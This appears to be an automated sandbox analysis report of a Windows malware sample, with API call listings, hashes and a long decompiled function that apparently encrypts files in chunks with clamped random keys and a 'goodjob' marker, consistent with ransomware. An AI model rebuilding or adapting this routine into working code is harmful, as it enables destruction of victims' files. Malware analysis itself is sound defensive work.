                                                                    • Opcode Fuzzy Hash: fbebf544c2108b4bf9674075e1986c58679578877b3ef46dae4da358ec7a367d
                                                                    • Instruction Fuzzy Hash: DAF0E933504A25E7EF326F269D05BDB3788AFC6770F14A021EC24FB190CA21DC0146E0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000000,00000001,00E64831,?,00EA8D0C,00E64837,00E64831,?,00000000,?,00E820BF,00E64835,00E64835), ref: 00EB64CE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: c98d12343030d57d5535921556e6ee345737b41b0ab3f2742f1d62a33ac4ceba
                                                                    • Instruction ID: 959220ced044d4d5ccf852a78b7c9abb6a5f30825396325984d9f75d621736e2
                                                                    • Opcode Fuzzy Hash: c98d12343030d57d5535921556e6ee345737b41b0ab3f2742f1d62a33ac4ceba
                                                                    • Instruction Fuzzy Hash: 41E0ED32500A2056EA303A66DC00BDF3A88BF027B8F142120ED29B66A0CB28CC0186E0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlEncodePointer.NTDLL(?,?,00EA6439,00EA6480,?,00EA62C6,00000000,00000000,00000000,00000004,00E735BB,00000001,00000008,?,?,00000000), ref: 00EA7364
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: EncodePointer
                                                                    • String ID:
                                                                    • API String ID: 2118026453-0
                                                                    • Opcode ID: f1ac82e4ac3bf3f560fa80422b2bf17fdc41bf9aa52981635d11d5312b9362c8
                                                                    • Instruction ID: cbac4f0ca83ec0b2061d3d4ee9ee989b997368b4cc28a68d95c1259e1b2f31bb
                                                                    • Opcode Fuzzy Hash: f1ac82e4ac3bf3f560fa80422b2bf17fdc41bf9aa52981635d11d5312b9362c8
                                                                    • Instruction Fuzzy Hash: 22D09270008A8CDFCB699F6AFD946553BA8E304346B408038F808A62B2C7B25469CF68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _free.LIBCMT ref: 00EAEBEB
                                                                      • Part of subcall function 00EB5945: RtlFreeHeap.NTDLL(00000000,00000000,?,00EBE5A9,00E64835,00000000,00E64835,00E64837,?,00EBE84C,00E64835,00000007,00E64835,?,00EBECFA,00E64835), ref: 00EB595B
                                                                      • Part of subcall function 00EB5945: GetLastError.KERNEL32(00E64835,?,00EBE5A9,00E64835,00000000,00E64835,00E64837,?,00EBE84C,00E64835,00000007,00E64835,?,00EBECFA,00E64835,00E64835), ref: 00EB596D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.236407539.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                                    • Associated: 00000000.00000002.236400825.0000000000E50000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236508723.0000000000ECD000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.236525533.0000000000EEF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237685235.0000000000EF0000.00000008.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237761099.0000000000F29000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.237827402.0000000000F2D000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorFreeHeapLast_free
                                                                    • String ID:
                                                                    • API String ID: 1353095263-0
                                                                    • Opcode ID: 7c713e512b1cd2b25975bb874b674e2712c28576aba6603603807cf6786cc7e1
                                                                    • Instruction ID: a3688b88a86a0641c4f657532f606016d45d91e65f0cd938891cfebaf87217f4
                                                                    • Opcode Fuzzy Hash: 7c713e512b1cd2b25975bb874b674e2712c28576aba6603603807cf6786cc7e1
                                                                    • Instruction Fuzzy Hash: C4C08C32000208FBCB009B81C806B8E7BB8DBC0374F200044F41027250CAB1EE009680
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    C-Code - Quality: 62%
                                                                    			E00E6C990(void* __ebx, WCHAR** __ecx, void** __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, char _a10, signed int _a12, signed int _a16, signed int _a20, char _a24, signed int _a28, intOrPtr* _a32, void** _a36, long _a40, signed int _a44, void* _a48) {
                                                                    				char _v0;
                                                                    				long _v8;
                                                                    				long _v12;
                                                                    				char _v16;
                                                                    				signed int _v20;
                                                                    				signed int _v24;
                                                                    				char _v28;
                                                                    				char _v32;
                                                                    				struct _SECURITY_ATTRIBUTES* _v36;
                                                                    				struct _SECURITY_ATTRIBUTES* _v40;
                                                                    				char _v56;
                                                                    				struct _SECURITY_ATTRIBUTES* _v60;
                                                                    				long _v64;
                                                                    				char _v76;
                                                                    				struct _SECURITY_ATTRIBUTES* _v80;
                                                                    				char _v84;
                                                                    				unsigned int _v104;
                                                                    				unsigned int _v108;
                                                                    				signed char _v112;
                                                                    				char _v140;
                                                                    				char _v1124;
                                                                    				void* _v1140;
                                                                    				long _v1144;
                                                                    				char _v1148;
                                                                    				void _v1152;
                                                                    				long _v1156;
                                                                    				signed int _v1160;
                                                                    				signed int _v1164;
                                                                    				void* _v1172;
                                                                    				signed int _v1176;
                                                                    				union _LARGE_INTEGER* _v1180;
                                                                    				long _v1184;
                                                                    				char _v1192;
                                                                    				signed int _v1193;
                                                                    				signed char _v1224;
                                                                    				char _v1256;
                                                                    				intOrPtr _v1260;
                                                                    				char _v1264;
                                                                    				intOrPtr _v1332;
                                                                    				char _v1336;
                                                                    				char _v1464;
                                                                    				struct _SECURITY_ATTRIBUTES* _v1472;
                                                                    				char _v1688;
                                                                    				char _v1936;
                                                                    				signed int _v1937;
                                                                    				signed int _v1938;
                                                                    				signed int _v1944;
                                                                    				long _v1948;
                                                                    				void* _v1952;
                                                                    				signed int _v1956;
                                                                    				union _LARGE_INTEGER* _v1960;
                                                                    				void* _v1964;
                                                                    				long _v1968;
                                                                    				union _LARGE_INTEGER* _v1972;
                                                                    				char _v1973;
                                                                    				void* _v1980;
                                                                    				void* _v1984;
                                                                    				signed int _v1988;
                                                                    				signed int _v1992;
                                                                    				signed int _v1996;
                                                                    				intOrPtr* _v2000;
                                                                    				char _v2001;
                                                                    				char _v2002;
                                                                    				char _v2003;
                                                                    				char _v2004;
                                                                    				void* _v2008;
                                                                    				union _LARGE_INTEGER _v2012;
                                                                    				union _LARGE_INTEGER* _v2016;
                                                                    				union _LARGE_INTEGER _v2020;
                                                                    				WCHAR** _v2024;
                                                                    				signed int _v2028;
                                                                    				void** _v2032;
                                                                    				union _LARGE_INTEGER* _v2036;
                                                                    				union _LARGE_INTEGER _v2040;
                                                                    				char _v2042;
                                                                    				char _v2043;
                                                                    				signed short _v2044;
                                                                    				signed int _v2048;
                                                                    				char _v2052;
                                                                    				struct _SECURITY_ATTRIBUTES* _v2056;
                                                                    				long _v2060;
                                                                    				intOrPtr _v2064;
                                                                    				signed int _v2068;
                                                                    				char _v2092;
                                                                    				char _v2116;
                                                                    				struct _SECURITY_ATTRIBUTES* _v2124;
                                                                    				char _v2132;
                                                                    				signed int _v2136;
                                                                    				intOrPtr _v2208;
                                                                    				short _v2210;
                                                                    				char _v2212;
                                                                    				long _v2216;
                                                                    				void* __ebp;
                                                                    				signed int _t596;
                                                                    				signed int _t597;
                                                                    				void* _t607;
                                                                    				signed int _t610;
                                                                    				signed int _t611;
                                                                    				signed int _t612;
                                                                    				signed int _t615;
                                                                    				intOrPtr* _t616;
                                                                    				char _t617;
                                                                    				char _t618;
                                                                    				char _t619;
                                                                    				signed int _t620;
                                                                    				signed int _t621;
                                                                    				signed int _t622;
                                                                    				signed int _t623;
                                                                    				signed int _t624;
                                                                    				signed int _t627;
                                                                    				signed int _t628;
                                                                    				char* _t629;
                                                                    				signed int _t631;
                                                                    				unsigned int _t642;
                                                                    				signed short _t643;
                                                                    				struct _SECURITY_ATTRIBUTES* _t647;
                                                                    				unsigned int _t651;
                                                                    				signed int _t655;
                                                                    				unsigned int _t659;
                                                                    				signed int _t663;
                                                                    				unsigned int _t681;
                                                                    				signed int _t684;
                                                                    				signed int _t695;
                                                                    				signed int _t697;
                                                                    				signed int _t708;
                                                                    				char _t714;
                                                                    				char _t716;
                                                                    				void* _t720;
                                                                    				intOrPtr _t722;
                                                                    				intOrPtr* _t723;
                                                                    				signed int _t724;
                                                                    				char* _t729;
                                                                    				signed int _t734;
                                                                    				union _LARGE_INTEGER _t736;
                                                                    				long _t739;
                                                                    				signed int _t743;
                                                                    				void* _t749;
                                                                    				long _t753;
                                                                    				signed int _t755;
                                                                    				void* _t758;
                                                                    				void* _t765;
                                                                    				intOrPtr* _t766;
                                                                    				void* _t768;
                                                                    				intOrPtr _t775;
                                                                    				intOrPtr _t778;
                                                                    				intOrPtr _t781;
                                                                    				signed int _t792;
                                                                    				void* _t794;
                                                                    				void* _t795;
                                                                    				char* _t796;
                                                                    				signed int _t814;
                                                                    				intOrPtr _t816;
                                                                    				union _LARGE_INTEGER _t817;
                                                                    				void* _t828;
                                                                    				union _LARGE_INTEGER* _t831;
                                                                    				void* _t835;
                                                                    				long _t837;
                                                                    				signed int _t843;
                                                                    				signed int _t844;
                                                                    				signed int _t845;
                                                                    				int _t861;
                                                                    				void* _t872;
                                                                    				signed int _t878;
                                                                    				signed int _t879;
                                                                    				char _t884;
                                                                    				char _t885;
                                                                    				char _t886;
                                                                    				intOrPtr _t887;
                                                                    				intOrPtr _t890;
                                                                    				signed int _t899;
                                                                    				signed int _t900;
                                                                    				signed int _t904;
                                                                    				signed int _t906;
                                                                    				union _LARGE_INTEGER* _t907;
                                                                    				signed int _t908;
                                                                    				signed int _t909;
                                                                    				short* _t910;
                                                                    				signed int _t916;
                                                                    				void* _t928;
                                                                    				intOrPtr* _t929;
                                                                    				void* _t931;
                                                                    				intOrPtr _t938;
                                                                    				intOrPtr _t941;
                                                                    				intOrPtr _t944;
                                                                    				intOrPtr _t948;
                                                                    				void* _t953;
                                                                    				signed int _t954;
                                                                    				unsigned int _t956;
                                                                    				signed char _t957;
                                                                    				signed int _t962;
                                                                    				long _t963;
                                                                    				unsigned int _t970;
                                                                    				struct _SECURITY_ATTRIBUTES* _t971;
                                                                    				unsigned int _t978;
                                                                    				char* _t984;
                                                                    				signed char _t985;
                                                                    				union _LARGE_INTEGER* _t987;
                                                                    				signed char _t989;
                                                                    				char _t993;
                                                                    				signed int _t998;
                                                                    				union _LARGE_INTEGER* _t999;
                                                                    				signed int _t1017;
                                                                    				struct %anon52 _t1018;
                                                                    				void* _t1020;
                                                                    				union _LARGE_INTEGER* _t1021;
                                                                    				void* _t1022;
                                                                    				void* _t1026;
                                                                    				void* _t1031;
                                                                    				signed int _t1035;
                                                                    				long _t1037;
                                                                    				signed char _t1041;
                                                                    				signed int _t1054;
                                                                    				long _t1057;
                                                                    				signed char _t1059;
                                                                    				signed char _t1060;
                                                                    				void** _t1075;
                                                                    				intOrPtr _t1079;
                                                                    				long _t1086;
                                                                    				intOrPtr _t1089;
                                                                    				signed int _t1091;
                                                                    				signed int _t1092;
                                                                    				signed int _t1094;
                                                                    				long _t1095;
                                                                    				void* _t1096;
                                                                    				void* _t1097;
                                                                    				WCHAR** _t1099;
                                                                    				void* _t1100;
                                                                    				void* _t1101;
                                                                    				long _t1102;
                                                                    				intOrPtr _t1103;
                                                                    				signed int _t1105;
                                                                    				void* _t1108;
                                                                    				signed int _t1110;
                                                                    				signed int _t1111;
                                                                    				void* _t1115;
                                                                    				intOrPtr* _t1116;
                                                                    				WCHAR** _t1118;
                                                                    				signed int _t1119;
                                                                    				signed int _t1120;
                                                                    				void* _t1121;
                                                                    				void* _t1122;
                                                                    				signed int _t1123;
                                                                    				void* _t1126;
                                                                    				void* _t1127;
                                                                    				void* _t1128;
                                                                    				void* _t1131;
                                                                    				void* _t1132;
                                                                    				void* _t1134;
                                                                    				void* _t1135;
                                                                    				void* _t1137;
                                                                    				union _LARGE_INTEGER* _t1138;
                                                                    				void* _t1142;
                                                                    				void* _t1143;
                                                                    
                                                                    				_t1053 = __edx;
                                                                    				_t953 = __ebx;
                                                                    				_push(0xffffffff);
                                                                    				_push(0xec7ecd);
                                                                    				_push( *[fs:0x0]);
                                                                    				_t1122 = _t1121 - 0x834;
                                                                    				_t596 =  *0xeef074; // 0xa6abe2d4
                                                                    				_t597 = _t596 ^ _t1119;
                                                                    				_v20 = _t597;
                                                                    				_push(__esi);
                                                                    				_push(__edi);
                                                                    				_push(_t597);
                                                                    				 *[fs:0x0] =  &_v16;
                                                                    				_t1099 = __ecx;
                                                                    				_v2024 = __ecx;
                                                                    				_t1085 = _a28;
                                                                    				_v1988 = _a4;
                                                                    				_v2048 = _a16;
                                                                    				_v2028 = _a20;
                                                                    				_v2032 = _a36;
                                                                    				_v1996 = _t1085;
                                                                    				_v2008 = _a48;
                                                                    				CloseHandle( *__edx);
                                                                    				_v1952 = CreateFileW( *_t1099, 0x12019f, 3, 0, 3, 0x10000000, 0);
                                                                    				_t1100 = CreateFileW( *_t1099, 0x12019b, 3, 0, 3, 0xb0000000, 0);
                                                                    				_t607 = _v1952;
                                                                    				_v1980 = _t1100;
                                                                    				if(_t607 != 0xffffffff) {
                                                                    					L18:
                                                                    					__eflags = _t1100 - 0xffffffff;
                                                                    					_t1101 =  ==  ? _t607 : _t1100;
                                                                    					__eflags = _v1988;
                                                                    					_v1980 = _t1101;
                                                                    					if(_v1988 != 0) {
                                                                    						asm("xorps xmm0, xmm0");
                                                                    						asm("movups [ebp-0x38], xmm0");
                                                                    						asm("movups [ebp-0x28], xmm0");
                                                                    						asm("movq [ebp-0x18], xmm0");
                                                                    						 *0xf2c0b0( &_v60, 0x28);
                                                                    						_t607 = _v1952;
                                                                    					}
                                                                    					_v1144 = 0;
                                                                    					_v1156 = 0;
                                                                    					__imp__GetFileSizeEx(_t607,  &_v1164);
                                                                    					__eflags = _t607;
                                                                    					if(_t607 == 0) {
                                                                    						asm("xorps xmm0, xmm0");
                                                                    						asm("movlpd [ebp-0x488], xmm0");
                                                                    					}
                                                                    					_t962 = _v1164;
                                                                    					_t1054 = _v1160;
                                                                    					__eflags = _t962 | _t1054;
                                                                    					_v1956 = _t962;
                                                                    					_v1972 = _t1054;
                                                                    					if((_t962 | _t1054) != 0) {
                                                                    						_v1148 = 0xab7da094;
                                                                    						_v1152 = 0;
                                                                    						__eflags = _t1054;
                                                                    						if(__eflags < 0) {
                                                                    							L37:
                                                                    							_t610 = _a44;
                                                                    							_t611 = _t610 * 0x400;
                                                                    							_t1057 = (_t610 * 0x00000400 >> 0x00000020 << 0x00000020 | _t611) << 0xa;
                                                                    							_t612 = _t611 << 0xa;
                                                                    							__eflags = _v1972 - 0x400;
                                                                    							if(__eflags < 0) {
                                                                    								L59:
                                                                    								_t963 = _a40;
                                                                    								_v1937 = _t963;
                                                                    								goto L61;
                                                                    							} else {
                                                                    								if(__eflags > 0) {
                                                                    									L40:
                                                                    									_t963 = _a40;
                                                                    									_v1937 = _t963;
                                                                    									__eflags = _t963 - 0x7f;
                                                                    									if(_t963 >= 0x7f) {
                                                                    										L61:
                                                                    										__eflags = _t963;
                                                                    										if(_t963 == 0) {
                                                                    											goto L57;
                                                                    										} else {
                                                                    											goto L62;
                                                                    										}
                                                                    									} else {
                                                                    										_t1057 =  *_v2024;
                                                                    										_t1037 = _t1057;
                                                                    										_v1968 = _t1057;
                                                                    										_t101 = _t1037 + 2; // 0x402
                                                                    										_t1115 = _t101;
                                                                    										do {
                                                                    											_t906 =  *_t1037;
                                                                    											_t1037 = _t1037 + 2;
                                                                    											__eflags = _t906;
                                                                    										} while (_t906 != 0);
                                                                    										_t963 = (_t1037 - _t1115 >> 1) + 0xffffffff;
                                                                    										__eflags = _t963;
                                                                    										if(_t963 != 0) {
                                                                    											_t910 = _t1057 + _t963 * 2;
                                                                    											while(1) {
                                                                    												__eflags =  *_t910 - 0x2e;
                                                                    												if( *_t910 == 0x2e) {
                                                                    													break;
                                                                    												}
                                                                    												_t910 = _t910 - 2;
                                                                    												_t963 = _t963 - 1;
                                                                    												__eflags = _t963;
                                                                    												if(_t963 != 0) {
                                                                    													continue;
                                                                    												} else {
                                                                    												}
                                                                    												goto L49;
                                                                    											}
                                                                    											_t1057 = _t910 + 2;
                                                                    											_v1968 = _t1057;
                                                                    										}
                                                                    										L49:
                                                                    										_t907 =  *0xf2c1a4; // 0x814d54
                                                                    										_t1116 =  *0xf2c1a0; // 0x814ce0
                                                                    										_v2016 = _t907;
                                                                    										__eflags = _t1116 - _t907;
                                                                    										if(_t1116 == _t907) {
                                                                    											L52:
                                                                    											_t1057 = _v1968;
                                                                    											_t908 = E00E649F0(0xf2c194, _t1057);
                                                                    											__eflags = _t908;
                                                                    											if(_t908 != 0) {
                                                                    												L54:
                                                                    												_t1041 = _v1937;
                                                                    												__eflags = _t1041 - 2;
                                                                    												if(_t1041 >= 2) {
                                                                    													_t963 = _t1041 + _t1041;
                                                                    													_v1937 = _t963;
                                                                    													goto L61;
                                                                    												} else {
                                                                    													_t963 = 4;
                                                                    													_v1937 = 4;
                                                                    													L62:
                                                                    													asm("cdq");
                                                                    													_v2016 = _t963 & 0x000000ff;
                                                                    													_v1944 = _a12;
                                                                    													_v2012.LowPart = _t1057;
                                                                    													asm("adc edx, 0x0");
                                                                    													_t899 = E00EA8320((_t963 & 0x000000ff) + 2, _t1057, _a8, _a12);
                                                                    													_t1114 = _v1972;
                                                                    													_t1057 = (_t1057 << 0x00000020 | _t899) << 0x10;
                                                                    													_t900 = _t899 << 0x10;
                                                                    													__eflags = _t1057 - _v1972;
                                                                    													if(__eflags < 0) {
                                                                    														L66:
                                                                    														_t1102 = _a12;
                                                                    													} else {
                                                                    														if(__eflags > 0) {
                                                                    															L65:
                                                                    															asm("adc ecx, 0x0");
                                                                    															_t963 = (_v2012.LowPart << 0x00000020 |  &(_v2016->LowPart.LowPart)) << 0x11;
                                                                    															_t904 = E00EC44A0(_v1956, _t1114,  &(_v2016->LowPart.LowPart) << 0x11, _t963);
                                                                    															_t1102 = _t1057;
                                                                    															_a8 = _t904;
                                                                    															_v1944 = _t1102;
                                                                    														} else {
                                                                    															__eflags = _t900 - _v1956;
                                                                    															if(_t900 <= _v1956) {
                                                                    																goto L66;
                                                                    															} else {
                                                                    																goto L65;
                                                                    															}
                                                                    														}
                                                                    													}
                                                                    												}
                                                                    											} else {
                                                                    												__eflags = _v2028 - 4;
                                                                    												if(_v2028 != 4) {
                                                                    													_t963 = _v1937;
                                                                    													goto L61;
                                                                    												} else {
                                                                    													goto L54;
                                                                    												}
                                                                    											}
                                                                    										} else {
                                                                    											while(1) {
                                                                    												_t909 = E00EAEC6F(_t1085, _t1116,  *_t1116, _t1057);
                                                                    												_t1122 = _t1122 + 8;
                                                                    												__eflags = _t909;
                                                                    												if(_t909 == 0) {
                                                                    													break;
                                                                    												}
                                                                    												_t1057 = _v1968;
                                                                    												_t1116 = _t1116 + 4;
                                                                    												__eflags = _t1116 - _v2016;
                                                                    												if(_t1116 != _v2016) {
                                                                    													continue;
                                                                    												} else {
                                                                    													goto L52;
                                                                    												}
                                                                    												goto L67;
                                                                    											}
                                                                    											_v1937 = 0;
                                                                    											L57:
                                                                    											_t1102 = _a12;
                                                                    											_v1944 = _t1102;
                                                                    										}
                                                                    									}
                                                                    								} else {
                                                                    									__eflags = _t962 - _t612;
                                                                    									if(_t962 <= _t612) {
                                                                    										goto L59;
                                                                    									} else {
                                                                    										goto L40;
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    							L67:
                                                                    							__eflags = _v2028;
                                                                    							_v1992 =  &_v1140;
                                                                    							_v2056 = 0;
                                                                    							_v1984 =  &_v1336;
                                                                    							_push(0xf2c1dc);
                                                                    							if(_v2028 == 0) {
                                                                    								_t615 =  *0xf2bfd0; // 0x0
                                                                    								_v1992 = _t615;
                                                                    								_t616 =  *0xf2bfc8; // 0x0
                                                                    								_v2000 = _t616;
                                                                    								_t617 =  *0xf2c098; // 0x0
                                                                    								_v2004 = _t617;
                                                                    								_t618 =  *0xf2c09a; // 0x0
                                                                    								_v2002 = _t618;
                                                                    								_t619 =  *0xf2c09b; // 0x0
                                                                    								_v1984 = 0xf2bfd8;
                                                                    								_v2003 = _t619;
                                                                    								_v2001 = _t619;
                                                                    								_t620 = E00EA5E4B();
                                                                    								_t1123 = _t1122 + 4;
                                                                    								__eflags = _t620;
                                                                    								if(_t620 != 0) {
                                                                    									goto L205;
                                                                    								} else {
                                                                    									 *_v2008 =  *_v2008 + _v1164;
                                                                    									asm("adc [ecx+0x4], eax");
                                                                    									goto L75;
                                                                    								}
                                                                    							} else {
                                                                    								_t845 = E00EA5E4B();
                                                                    								_t1123 = _t1122 + 4;
                                                                    								__eflags = _t845;
                                                                    								if(_t845 != 0) {
                                                                    									goto L204;
                                                                    								} else {
                                                                    									_t884 =  *0xf2c0a0; // 0x0
                                                                    									_v2004 = _t884;
                                                                    									_t885 =  *0xf2c0a2; // 0x0
                                                                    									_v2002 = _t885;
                                                                    									_t886 =  *0xf2c0a3; // 0x0
                                                                    									_v2003 = _t886;
                                                                    									_v2001 = _t886;
                                                                    									_t887 =  *0xf2bfcc; // 0x0
                                                                    									_v2000 = _t887;
                                                                    									E00EA90F0( &_v1140,  *0xf2bfd4, _t887);
                                                                    									_t1035 = _v1164;
                                                                    									_t1123 = _t1123 + 0xc;
                                                                    									_t890 =  *0xf2c024; // 0x0
                                                                    									_t1079 = _t1035 +  *0xf2c088;
                                                                    									_t1095 =  *0xf2c08c; // 0x0
                                                                    									asm("movups xmm0, [0xf2c028]");
                                                                    									_v1332 = _t890;
                                                                    									asm("adc edi, eax");
                                                                    									_v1968 = _t1095;
                                                                    									 *0xf2c08c = _t1095;
                                                                    									_t1085 = _v2008;
                                                                    									asm("movups [ebp-0x52c], xmm0");
                                                                    									 *0xf2c088 = _t1079;
                                                                    									asm("movups xmm0, [0xf2c038]");
                                                                    									 *_v2008 =  *_v2008 + _t1035;
                                                                    									asm("adc [edi+0x4], eax");
                                                                    									_t892 = _v1968;
                                                                    									asm("movups [ebp-0x51c], xmm0");
                                                                    									__eflags = _v1968 - 0x25;
                                                                    									if(__eflags >= 0) {
                                                                    										if(__eflags > 0) {
                                                                    											L72:
                                                                    											 *0xf2c088 = E00EC4970(_t1079, _t892, 0x80000000, 0x25);
                                                                    											 *0xf2c08c = _t1079;
                                                                    											SetEvent( *0xf2c26c);
                                                                    											WaitForSingleObject( *0xf2c270, 0xffffffff);
                                                                    										} else {
                                                                    											__eflags = _t1079 - 0x80000000;
                                                                    											if(_t1079 > 0x80000000) {
                                                                    												goto L72;
                                                                    											}
                                                                    										}
                                                                    									}
                                                                    									L75:
                                                                    									E00EA5E5C(0xf2c1dc);
                                                                    									_t1126 = _t1123 + 4;
                                                                    									__eflags = _t1102;
                                                                    									if(__eflags > 0) {
                                                                    										_t695 = _a8;
                                                                    									} else {
                                                                    										if(__eflags < 0) {
                                                                    											L78:
                                                                    											_t695 = 1;
                                                                    											_v1944 = 0;
                                                                    											_a8 = 1;
                                                                    										} else {
                                                                    											_t695 = _a8;
                                                                    											__eflags = _t695 - 1;
                                                                    											if(_t695 < 1) {
                                                                    												goto L78;
                                                                    											}
                                                                    										}
                                                                    									}
                                                                    									_t987 = _v1972;
                                                                    									_t1105 = _t695;
                                                                    									asm("xorps xmm0, xmm0");
                                                                    									_t697 = (_v1944 << 0x00000020 | _t1105) << 0x10;
                                                                    									asm("movlpd [ebp-0x7e0], xmm0");
                                                                    									_t1102 = _t1105 << 0x10;
                                                                    									_v1944 = _t697;
                                                                    									_v2060 = _t1102;
                                                                    									__eflags = _t697 - _t987;
                                                                    									if(__eflags >= 0) {
                                                                    										if(__eflags > 0) {
                                                                    											L83:
                                                                    											_t1111 = _v1956;
                                                                    											_t1102 = _t1111 - E00EC4630(_t1111, _t987, 0x10000, 0);
                                                                    											__eflags = _t1102;
                                                                    											_v2060 = _t1102;
                                                                    											asm("sbb eax, edx");
                                                                    											_v1944 = _v1972;
                                                                    										} else {
                                                                    											__eflags = _t1102 - _v1956;
                                                                    											if(_t1102 > _v1956) {
                                                                    												goto L83;
                                                                    											}
                                                                    										}
                                                                    									}
                                                                    									_push(_t987);
                                                                    									E00E919E0( &_v1936, _t1085);
                                                                    									_t989 = _v1992;
                                                                    									E00E8D540(_t989,  &_v2056,  &_v1936, _v2000);
                                                                    									E00EA8F90(_t1085,  &_v1264, 0, 0x48);
                                                                    									_t1127 = _t1126 + 0x18;
                                                                    									_v1260 = 0xedca48;
                                                                    									__eflags = _v1988;
                                                                    									if(_v1988 != 0) {
                                                                    										asm("xorps xmm0, xmm0");
                                                                    										asm("movups [ebp-0x4c4], xmm0");
                                                                    										asm("movups [ebp-0x4b4], xmm0");
                                                                    										_t878 =  *0xf2c0b0( &_v1224, 0x20);
                                                                    										_t989 = _v1224;
                                                                    										__eflags = _t878;
                                                                    										_t879 = _v1193;
                                                                    										if(_t878 != 0) {
                                                                    											_t989 = _t989 & 0x000000f8;
                                                                    											_t879 = _t879 & 0x0000003f | 0x00000040;
                                                                    											__eflags = _t879;
                                                                    											_v1224 = _t989;
                                                                    											_v1193 = _t879;
                                                                    										}
                                                                    										__eflags = _t989 & 0x00000007;
                                                                    										if((_t989 & 0x00000007) == 0) {
                                                                    											__eflags = _t879;
                                                                    											if(__eflags >= 0) {
                                                                    												_t989 =  &_v1256;
                                                                    												E00E93D60(_t989,  &_v1224, _t1085, _t1102, __eflags, 0xedea50);
                                                                    												_t1127 = _t1127 + 4;
                                                                    											}
                                                                    										}
                                                                    									}
                                                                    									_push(_t989);
                                                                    									_v2052 = 0x20;
                                                                    									E00E8CD60( &_v1264, _v1984, _t1085, _t1102,  &_v140,  &_v2052);
                                                                    									_v1472 = 0;
                                                                    									E00E918B0( &_v1688);
                                                                    									E00E91590( &_v1688,  &_v140, 0x20);
                                                                    									_t1128 = _t1127 + 0x10;
                                                                    									_t708 = E00E91760( &_v1688);
                                                                    									__eflags = _t708;
                                                                    									if(_t708 == 0) {
                                                                    										asm("movups xmm0, [ebp-0x694]");
                                                                    										asm("movups [ebp-0x68], xmm0");
                                                                    										asm("movups xmm0, [ebp-0x684]");
                                                                    										asm("movups [ebp-0x58], xmm0");
                                                                    										asm("movups xmm0, [ebp-0x674]");
                                                                    										asm("movups [ebp-0x48], xmm0");
                                                                    										E00E918B0( &_v1688);
                                                                    									}
                                                                    									asm("movups xmm0, [ebp-0x38]");
                                                                    									_t993 = _a10;
                                                                    									_v2044 = _v1937;
                                                                    									_v2043 = _a8;
                                                                    									_v2042 = _t993;
                                                                    									_t1089 =  &_v1124 - ( &_v1140 & 0x00000007);
                                                                    									_push(0x14);
                                                                    									_push(0x32);
                                                                    									_push(_t1089);
                                                                    									asm("movups [edi], xmm0");
                                                                    									 *((short*)(_t1089 + 0x28)) = _v2044 & 0x0000ffff;
                                                                    									asm("movups xmm0, [ebp-0x28]");
                                                                    									_t714 = "goodjob"; // 0x646f6f67
                                                                    									 *((char*)(_t1089 + 0x2a)) = _t993;
                                                                    									asm("movups [edi+0x10], xmm0");
                                                                    									_push(_t1089);
                                                                    									asm("movq xmm0, [ebp-0x18]");
                                                                    									asm("movq [edi+0x20], xmm0");
                                                                    									asm("movups xmm0, [ebp-0x4e4]");
                                                                    									 *((intOrPtr*)(_t1089 + 0x2b)) = _t714;
                                                                    									 *((short*)(_t1089 + 0x2f)) =  *0xedc368 & 0x0000ffff;
                                                                    									_t716 = M00EDC36A; // 0x62
                                                                    									 *((char*)(_t1089 + 0x31)) = _t716;
                                                                    									asm("movups [edi+0x32], xmm0");
                                                                    									_push( &_v76);
                                                                    									asm("movups xmm0, [ebp-0x4d4]");
                                                                    									_v2000 = _t1089;
                                                                    									_push( &_v108);
                                                                    									asm("movups [edi+0x42], xmm0");
                                                                    									E00EA4A70();
                                                                    									_push(_v1988);
                                                                    									_push( &_v1936);
                                                                    									_push(0x3d8);
                                                                    									_push(_t1089);
                                                                    									_t720 = E00E92920(_t1089, 0x52);
                                                                    									_t1131 = _t1128 + 0x18 - 0x20 + 0x30;
                                                                    									E00E91CE0( &_v1936);
                                                                    									_t722 = _v2000;
                                                                    									 *((intOrPtr*)(_t722 - 4)) = _v2004;
